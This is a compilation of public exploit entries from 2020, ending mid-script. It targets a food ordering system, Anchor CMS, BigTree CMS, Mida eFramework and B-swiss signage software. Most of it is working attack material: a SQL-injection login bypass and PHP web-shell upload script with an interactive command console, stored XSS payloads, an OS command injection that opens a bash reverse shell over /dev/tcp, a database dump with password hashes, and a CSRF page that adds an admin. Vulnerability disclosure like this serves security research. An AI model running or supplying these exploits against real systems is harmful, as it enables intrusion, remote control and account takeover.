# Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated)
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren 'Aporlorxl23' Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Linux - XAMPP Server
# CVE : N/A
# Vulnerable Source Code:
# /view_prod.php
# [3] $qry = $conn->query("SELECT * FROM product_list where id =
".$_GET['id'])->fetch_array();
# PoC:
# Request:
GET /view_prod.php?id=' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
# Response:
HTTP/1.1 200 OK
Date: Tue, 22 Sep 2020 20:44:48 GMT
Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11
Perl/v5.30.3
X-Powered-By: PHP/7.4.7
Content-Length: 234
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Fatal error</b>: Uncaught Error: Call to a member function
fetch_array() on bool in /opt/lampp/htdocs/view_prod.php:3
Stack trace:
#0 {main}
thrown in <b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br />
# As shown above, PHP raises a fatal error because the value of `id` is concatenated straight into the query, which becomes:
# $qry = $conn->query("SELECT * FROM product_list where id = '")->fetch_array();
# With a single quote as the `id` value the SQL is syntactically invalid, so query() returns false and fetch_array() is then called on a bool.
# Recommended Fix:
Apply `mysqli_real_escape_string` to `id` and enclose the value in quotes inside the query, for example:
$qry = $conn->query("SELECT * FROM product_list where id = '" . mysqli_real_escape_string($conn, $_GET['id']) . "'")->fetch_array();
The quotes matter: the original query has none, so escaping alone would not contain the value. Because `id` is numeric, casting it with (int) or binding it through a prepared statement is the more robust fix.
# Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Windows/Linux - XAMPP Server
# CVE : N/A
# Setup: pip3 install bs4 .
# Exploit Code :
import requests,sys,string,random
from bs4 import BeautifulSoup
def get_random_string(length):
    """Return a random string of ``length`` lowercase ASCII letters.

    One ``random.choice`` call is made per character; the result is not
    cryptographically strong, which is fine for a throw-away file name.
    """
    alphabet = string.ascii_lowercase
    chars = [random.choice(alphabet) for _ in range(length)]
    return "".join(chars)
# Module-level HTTP session; Login(), FoundMyRCE() and Terminal() send
# through it, so cookies set by the login response are carried along.
session = requests.Session()
# Target base URL; filled in from argv by the __main__ block.
Domain = ""
# Random 5-letter basename for the uploaded file, generated once at import.
RandomFileName = "{}.php".format(get_random_string(5))
def Help():
    """Print the one-line usage message."""
    usage = "[?] Usage: python AporlorRCE.py <Domain>"
    print(usage)
def Upload():
    """Submit the admin "save_menu" form with a PHP file in the ``img`` field.

    Sends a hand-built multipart/form-data body (fixed boundary, captured
    from a browser session) to ``<Domain>/admin/ajax.php?action=save_menu``.
    The ``img`` part is named ``RandomFileName`` (a ``.php`` name) with
    ``Content-Type: application/x-php``; whether the server keeps the file
    depends on the upload handler doing no extension/MIME validation on it.

    Defender notes: validate the ``img`` upload server-side (allow-list image
    extensions, verify the content, store under a server-generated name and
    outside the web root). The attempt is observable as a POST to
    ``admin/ajax.php?action=save_menu`` whose multipart body declares a
    ``.php`` filename.
    """
    # A session local to this function is used for this request (it is not
    # the module-level ``session`` that Login() posts through).
    session = requests.session()
    burp0_url = Domain+"/admin/ajax.php?action=save_menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/index.php?page=menu", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018", "Connection": "close"}
    burp0_data = "-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------21991269520298699981411767018--\r\n"
    try:
        Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        # ``Resp`` is a requests.Response object, so comparing it with the
        # string "1" is never true (Login() compares ``Resp.text`` instead);
        # the message printed here is therefore not a reliable status.
        if Resp == "1":
            print("[+] Shell Upload Success")
        else:
            print("[-] Shell Upload Failed")
    except:
        # Bare except: any failure (connection, DNS, Ctrl-C) lands here.
        print("[-] Request Failed")
        Help()
def Login():
    """Authenticate against ``<Domain>/admin/ajax.php?action=login``.

    Both ``username`` and ``password`` are sent as ``' OR 1=1 #``, which can
    only succeed if the server builds its login query by interpolating the
    form fields into SQL rather than binding them. The application answers
    with the body ``1`` on success; the session cookie it sets is kept on the
    module-level ``session`` for the later requests.

    Defender notes: use a prepared statement with bound parameters for the
    login query. The attempt is observable as a login POST whose username
    field contains SQL metacharacters.
    """
    burp0_url = Domain+"/admin/ajax.php?action=login"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
    burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
    try:
        Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data)
        if Resp.text == "1":
            print("[+] Login Success")
        else:
            # Failure path; the "[+]" prefix is the original's wording.
            print("[+] Login Failed")
    except:
        # Bare except: any failure (connection, DNS, Ctrl-C) lands here.
        print("[-] Request Failed")
        Help()
def FoundMyRCE():
    """Find the uploaded file's name on the admin menu page; store it in ``FileName``.

    Fetches ``<Domain>/admin/index.php?page=menu`` through the module-level
    session, parses every ``<img>`` tag and keeps the ``src`` containing
    ``RandomFileName``. Note that ``str.strip("../assets/img/")`` removes any
    of those *characters* from both ends of the string, not the literal
    prefix, so the stored name is only exact when it neither starts nor ends
    with one of ``./asetimg``.
    """
    # Written here, read by Terminal().
    global FileName
    burp0_url = Domain+"/admin/index.php?page=menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    try:
        Resp = session.get(burp0_url, headers=burp0_headers)
        Soup = BeautifulSoup(Resp.text, "html5lib")
        Data = Soup.find_all("img")
        for MyRCE in Data:
            # An <img> without a src attribute raises KeyError here, which
            # the bare except below reports as a request failure.
            if RandomFileName in MyRCE["src"]:
                FileName = MyRCE["src"].strip("../assets/img/")
                print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/"))
    except:
        print("[-] Request Failed")
        Help()
def Terminal():
    """Interactive loop: read a line, send it as ``?cmd=`` to the uploaded file, print the body.

    ``FileName`` is the module-level name assigned by FoundMyRCE(); if that
    function never matched an image, the name is unbound and the first
    iteration raises NameError. ``KeyboardInterrupt`` is caught only around
    the HTTP request: a Ctrl-C at the ``input()`` prompt propagates out of
    the loop, which otherwise never ends.
    """
    while True:
        Command = input("Console: ")
        burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
        try:
            Resp = session.get(burp0_url)
            print(Resp.text)
        except KeyboardInterrupt:
            # Printed, but the loop continues with the next prompt.
            print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
        except:
            print("[-] Request Error")
if __name__ == "__main__":
    # Exactly one positional argument, the target base URL, is expected;
    # anything else prints the usage line and exits.
    if len(sys.argv) != 2:
        Help()
    else:
        Domain = sys.argv[1]
        Login()
        Upload()
        FoundMyRCE()
        Terminal()
# Exploit Title: Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-09-24
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://anchorcms.com/
# Version: 0.12.7
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/admin/
2- Login to admin panel.
3- Press "Posts" button.
4- Write XSS Payload into the description of the post.
5- Press "Save" button.
6- Go to the post.
XSS Payload ==> "><script>alert("XSS")</script>
==> HTTP Request <==
POST /admin/posts/edit/1 HTTP/1.1
Host: (HOST)
Content-Length: 262
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: /
Origin: http://(HOST)/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://(HOST)/admin/posts/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: anchorcms=21cdfqefqwefl69ij8231
Connection: close
token=mWgKk1tbYN6HAcj0jr6K2VKxBf6C311uemwTIrmEaHIi0zQpe7pNfHVm7zcoa3Fi&title=Post+Title&markdown=%0A&slug=hello-world&created=2020-09-24%2019%3A07%3A10
&description=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&status=published&category=1&css=&js=&autosave=false
# Exploit Title: BigTree CMS 4.4.10 - Remote Code Execution
# Google Dork: " BigTree CMS "
# Date: 2020-25-09
# Exploit Author: SunCSR (ThienNV and HoaVT - Sun* Cyber Security Research)
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/
# Version: 4.4.10
# Tested on: Windows
# CVE : N/A
## 1. Authenticated Remote Code Execution
# Attack type: Remote
# Impact: Remote arbitrary code execution
# Affected component(s): /core/admin/field-types/list/draw.php
# Attack vectors: An authenticated user (developer) can inject a malicious command into the application via the create-new-setting function:
# Description: BigTree 4.4.10 and earlier are vulnerable to authenticated remote code execution. An authenticated user (developer) can send a crafted request to the server and perform remote command execution (RCE).
# Severity (CVSS 3.1): Base Score: 9.1 CRITICAL
# POC: Developer create setting and code will be executed when load settings:
POST /BigTreeCMS/site/index.php/admin/developer/settings/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
Origin: http://xxxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/developer/settings/add/
Cookie: PHPSESSID=ipmr6c2jplqqlgcdrkgbtg4tfl; bigtree_admin[email]=tadmin%40bigtree.com; bigtree_admin[login]=%5B%22session-5f6d51f54fc301.14043773%22%2C%22chain-5f6d51f54fb248.84144127%22%5D
Upgrade-Insecure-Requests: 1
__csrf_token_PEFN3BUK0DAXK7Y10NJWT5E4813WXTXB__=tx6rzTz4ddDFI60tfcBe8tDN7lJ2YA3WlcdPLm/EbeY=&id=Test rce&name=Test rce&type=list&settings={"list_type":"static","allow-empty":"Yes","list":"whoami","pop-table":"","parser":"system"}&description=<p>Test rce</p>
# Video: https://vimeo.com/461667065
## 2. Authenticated SQL Injection
# Attack type: Remote
# Impact: Authenticated SQL Injection in BigTree CMS
# Attack vectors: An authenticated user (developer) can inject a malicious SQL query into the application via the create-new-feed function:
# Affected component(s): /core/feeds/custom.php
# Description: BigTree 4.4.10 and earlier are vulnerable to authenticated SQL injection. An authenticated user (developer) can send a malicious SQL query to the server and have it executed.
# Severity (CVSS 3.1): Base Score: 7.2 HIGH
# POC: Request create or edit feed:
POST /site/index.php/admin/developer/feeds/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
Origin: http://xxxx
Connection: close
Referer: http://xxxx/site/index.php/admin/developer/feeds/add/
Cookie: yyyy
__csrf_token_RW2U3KT3JXVY70AKWPV9UHG3HWQ12PP4__=S0%2B7MADREPOzg1%2Fkht7xbgzv0uKqrRpuccn2gOmft88%3D&name=SQL+Injection&table=sqli_test+union+select+sleep(5)%23&type=custom&settings=%7B%22sort%22%3A%22%60id%60+ASC%22%2C%22limit%22%3A%222%22%2C%22parser%22%3A%22system%2Cexec%22%7D&description=as&fields%5Bid%5D%5Bwidth%5D=&fields%5Bid%5D%5Btitle%5D=ID&fields%5Bid%5D%5Bparser%5D=12
# Video: https://vimeo.com/461667107
## 3. Authenticated Stored Cross-Site Scripting
# Attack type: Remote
# Impact: Stored XSS
# Affected component(s): site/index.php/admin/pages/update
# Attack vector(s): An authenticated user (developer) can inject malicious JavaScript into the application via the create- or update-page function:
# Description: Stored XSS vulnerabilities in the BigTree 4.4.10 and earlier allow remote authenticated user with low privilege (editor or publisher) to inject arbitrary web script or HTML via the page content to site/index.php/admin/pages/update
# Severity (CVSS 3): Base Score: 6.5 MEDIUM
# POC: Request create or edit page:
POST /BigTreeCMS/site/index.php/admin/pages/update/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2320192840320212926996245368
Content-Length: 12173
Origin: http://xxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/pages/edit/2/
Cookie: yyyy
---some fields here---
<p> <span class="s1"><em>These people are ridiculous and fake. This page is an example of a </em><a href="https://www.bigtreecms.org/docs/dev-guide/templates/" target="_blank" rel="noopener"><span class="s2"><em>basic template</em></span></a><em> with page content and a set of </em><a href="https://www.bigtreecms.org/docs/dev-guide/callouts/" target="_blank" rel="noopener"><span class="s2"><em>callouts</em></span></a><em>. Go to the </em><a href="https://www.bigtreecms.org/docs/dev-guide/installation/" target="_blank" rel="noopener"><span class="s2"><em>BigTree Developer Guide</em></span></a><em> for more.</em></span></p>
<p><span class="s1"><em>XSS here <script>alert(origin)</script></em></span></p>
-----------------------------2320192840320212926996245368
---some fields here---
# Video: https://vimeo.com/461667129
# Exploit Title: Mida eFramework 2.8.9 - Remote Code Execution
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.8.9
# CVE : CVE-2020-15922
#! /usr/bin/python3
# -*- coding: utf-8 -*-
import argparse
import base64
import random
import requests
import subprocess
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Suppress the InsecureRequestWarning urllib3 emits for every request sent
# with verify=False (run_cmd posts that way); certificate verification itself
# stays disabled for those calls, so the target's TLS identity is not checked.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def print_disclaimer():
    """Print the usage disclaimer banner (leading blank line, no trailing one)."""
    lines = (
        "",
        "---------------------",
        "Disclaimer:",
        "1) For testing purpose only.",
        "2) Do not attack production environments.",
        "3) Intended for educational purposes only and cannot be used for law",
        "violation or personal gain.",
        "4) The author is not responsible for any possible harm caused by this",
        "material.",
        "---------------------",
    )
    print("\n".join(lines))
def print_info():
    """Print the PoC banner: CVE reference, affected page and usage example."""
    lines = (
        "",
        "[*] PoC exploit for Mida eFramework 2.8.9 PDC (CVE-2020-15922)",
        "[*] Reference:https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html",
        "[*] Vulnerability: OS Command Injection RCE in PDC/pages/network.php -",
        "Reverse Shell",
        "./CVE-2020-15922 http://192.168.1.60:8090/PDC/pages/network.php rev-IP",
        "rev-PORT ",
    )
    print("\n".join(lines))
def run_cmd(url,ip,port):
    """POST the network-settings form with a shell command injected into ``ipaddress0``.

    Args:
        url: full URL of ``PDC/pages/network.php`` on the target.
        ip: address the reverse shell connects back to.
        port: port the reverse shell connects back to.

    The ``ipaddress0`` field is sent as ``"; <command>"``: the page hands the
    field to a shell (OS command injection, see print_info), so the ``;``
    ends the intended command and the injected one runs. A 1 s read timeout
    is the expected outcome -- a shell that stays connected keeps the HTTP
    response from completing -- so ``ReadTimeout`` is treated as "probably
    worked". TLS verification is disabled for this request (``verify=False``).

    Defender notes: validate ``ipaddress0``/``netmask0``/``gateway0``/``dns1``/
    ``dns2`` as address literals and never pass them to a shell; the attempt is
    observable as a POST to ``network.php`` with shell metacharacters in the
    address fields.
    """
    rev_shell = "sudo bash -i >& /dev/tcp/{0}/{1} 0>&1".format(ip,port)
    print("[+] Reverse shell: {0}".format(rev_shell))
    data = {
        "submit":"True",
        "ipaddress0":"; {0}".format(rev_shell),
        "netmask0":"",
        "gateway0":"",
        "dns1":"",
        "dns2":""
    }
    # exec rev shell
    print("[*] Starting reverse shell to {0} {1}...".format(ip,port))
    try:
        # ``r`` is never read; only the timeout path below produces output.
        r = requests.post(url,data=data,verify=False,timeout=1)
    except requests.exceptions.ReadTimeout:
        print("[?] ...check if it worked")
        pass
def main():
    """Print the banners, parse ``target``/``ip``/``port`` from argv and call run_cmd()."""
    print_info()
    print_disclaimer()
    parser = argparse.ArgumentParser()
    positional = (
        ("target", "the complete target URL"),
        ("ip", "the ip address for reverse shell"),
        ("port", "the port for reverse shell"),
    )
    for name, help_text in positional:
        parser.add_argument(name, type=str, help=help_text)
    args = parser.parse_args()
    run_cmd(args.target, args.ip, args.port)
# Script entry point; argument handling lives in main().
if __name__ == '__main__':
    main()
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure
# Date: 2020-09-16
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: 3.6.5
# Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00
B-swiss 3 Digital Signage System 3.6.5 Database Disclosure
Vendor: B-Swiss SARL | b-tween Sarl
Product web page: https://www.b-swiss.com
Affected version: 3.6.5
3.6.2
3.6.1
3.6.0
3.5.80
3.5.40
3.5.20
3.5.00
3.2.00
3.1.00
Summary: Intelligent digital signage made easy. To go beyond the
possibilities offered, b-swiss allows you to create the communication
solution for your specific needs and your graphic charter. You benefit
from our experience and know-how in the realization of your digital
signage project.
Desc: The application is vulnerable to unauthenticated database download
and information disclosure. This can enable an attacker to obtain
sensitive information, resulting in authentication bypass, session
hijacking and full system control.
Tested on: Linux 5.3.0-46-generic x86_64
Linux 4.15.0-20-generic x86_64
Linux 4.9.78-xxxx-std-ipv6-64
Linux 4.7.0-040700-generic x86_64
Linux 4.2.0-27-generic x86_64
Linux 3.19.0-47-generic x86_64
Linux 2.6.32-5-amd64 x86_64
Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
macOS 10.13.5
Microsoft Windows 7 Business Edition SP1 i586
Apache/2.4.29 (Ubuntu)
Apache/2.4.18 (Ubuntu)
Apache/2.4.7 (Ubuntu)
Apache/2.2.22 (Win64)
Apache/2.4.18 (Ubuntu)
Apache/2.2.16 (Debian)
PHP/7.2.24-0ubuntu0.18.04.6
PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
PHP/5.6.31
PHP/5.6.30-10+deb.sury.org~xenial+2
PHP/5.5.9-1ubuntu4.17
PHP/5.5.9-1ubuntu4.14
PHP/5.3.10
PHP/5.3.13
PHP/5.3.3-7+squeeze16
PHP/5.3.3-7+squeeze17
MySQL/5.5.49
MySQL/5.5.47
MySQL/5.5.40
MySQL/5.5.30
MySQL/5.1.66
MySQL/5.1.49
MySQL/5.0.77
MySQL/5.0.12-dev
MySQL/5.0.11-dev
MySQL/5.0.8-dev
phpMyAdmin/3.5.7
phpMyAdmin/3.4.10.1deb1
phpMyAdmin/3.4.7
phpMyAdmin/3.3.7deb7
WampServer 3.2.0
Acore Framework 2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5588
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php
13.06.2020
--
$ curl -s http://192.168.10.11/bswiss3.sql |grep admin_m -B1 -A4
INSERT INTO `users` (`id`, `created_by`, `created_by_adminlevelid`, `firstname`, `lastname`, `email`, `username`, `password`, `adminlevel`, `status`, `language`, `creationdate`, `receives_validation_alerts`, `can_change_password`) VALUES
(1, 0, 0, 'Dusko', 'Dolgousko', 'duki@looney.tunes', 'admin_m', '999f311dd5bd2b83ea849229a8906b29', 100000, 1, 'french-sw', '0000-00-00 00:00:00', 1, 0),
(3, 2, 7, 'b-swiss', ' ', ' ', 'b-swiss', '999f311dd5bd2b83ea849229a8906b29', 7, 1, 'french-sw', '2020-06-27 16:28:30', 0, 1),
(13, 3, 7, 'Admin', ' ', ' ', 'admin', '21232f297a57a5a743894a0e4a801fc3', 24, 1, 'french-sw', '2020-07-26 17:48:16', 0, 1),
(14, 13, 24, 'User', ' ', ' ', 'User', 'ee11cbb19052e40b07aac0ca060c23ee', 26, 1, 'french-sw', '2020-07-27 14:26:35', 0, 1),
(18, 13, 24, 'Test', ' ', ' ', 'test', '81dc9bdb52d04dc20036dbd8313ed055', 29, 1, 'french-sw', '2020-07-27 14:30:07', 0, 1);
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)
# Date: 2020-09-16
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: 3.6.5
Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00
<!--
B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin
Vendor: B-Swiss SARL | b-tween Sarl
Product web page: https://www.b-swiss.com
Affected version: 3.6.5
3.6.2
3.6.1
3.6.0
3.5.80
3.5.40
3.5.20
3.5.00
3.2.00
3.1.00
Summary: Intelligent digital signage made easy. To go beyond the
possibilities offered, b-swiss allows you to create the communication
solution for your specific needs and your graphic charter. You benefit
from our experience and know-how in the realization of your digital
signage project.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Linux 5.3.0-46-generic x86_64
Linux 4.15.0-20-generic x86_64
Linux 4.9.78-xxxx-std-ipv6-64
Linux 4.7.0-040700-generic x86_64
Linux 4.2.0-27-generic x86_64
Linux 3.19.0-47-generic x86_64
Linux 2.6.32-5-amd64 x86_64
Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
macOS 10.13.5
Microsoft Windows 7 Business Edition SP1 i586
Apache/2.4.29 (Ubuntu)
Apache/2.4.18 (Ubuntu)
Apache/2.4.7 (Ubuntu)
Apache/2.2.22 (Win64)
Apache/2.4.18 (Ubuntu)
Apache/2.2.16 (Debian)
PHP/7.2.24-0ubuntu0.18.04.6
PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
PHP/5.6.31
PHP/5.6.30-10+deb.sury.org~xenial+2
PHP/5.5.9-1ubuntu4.17
PHP/5.5.9-1ubuntu4.14
PHP/5.3.10
PHP/5.3.13
PHP/5.3.3-7+squeeze16
PHP/5.3.3-7+squeeze17
MySQL/5.5.49
MySQL/5.5.47
MySQL/5.5.40
MySQL/5.5.30
MySQL/5.1.66
MySQL/5.1.49
MySQL/5.0.77
MySQL/5.0.12-dev
MySQL/5.0.11-dev
MySQL/5.0.8-dev
phpMyAdmin/3.5.7
phpMyAdmin/3.4.10.1deb1
phpMyAdmin/3.4.7
phpMyAdmin/3.3.7deb7
WampServer 3.2.0
Acore Framework 2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5589
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php
13.06.2020
-->
<html>
<body>
<h1>CSRF Add b-swiss Maintenance Admin</h1>
<script>
// CSRF proof of concept. When a logged-in b-swiss administrator opens this
// page and presses the button, the browser sends a cross-origin POST to
// index.php that carries the victim's cookies (withCredentials = true). The
// body is a multipart "Users.Save" form with an empty "id" (presumably a new
// record) and rec_adminlevel 100000, the same level as the seeded
// maintenance account "admin_m" shown in the database-disclosure advisory
// above. Nothing in the request is bound to the victim's session other than
// the cookie: there is no anti-CSRF token, which is the flaw described in
// the advisory text.
// Mitigation: a per-session token checked on Users.Save, SameSite on the
// session cookie, and an Origin/Referer check. Detection: POSTs to index.php
// with locator=Users.Save whose Origin does not match the site.
function GodMode()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true);
    // Fixed boundary so the hand-built body below matches this header.
    xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed");
    xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
    // Attach the victim's cookies to the cross-origin request.
    xhr.withCredentials = true;
    var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"locator\"\r\n" +
    "\r\n" +
    "Users.Save\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"page\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"sort\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"id\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"ischildgrid\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"inpopup\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"ongridpage\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rowid\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"preview_screenid\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_firstname\"\r\n" +
    "\r\n" +
    "TestingusF\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_lastname\"\r\n" +
    "\r\n" +
    "TestingusL\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_email\"\r\n" +
    "\r\n" +
    "aa@bb.cc\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_username\"\r\n" +
    "\r\n" +
    "testingus\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_password\"\r\n" +
    "\r\n" +
    "123456\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" +
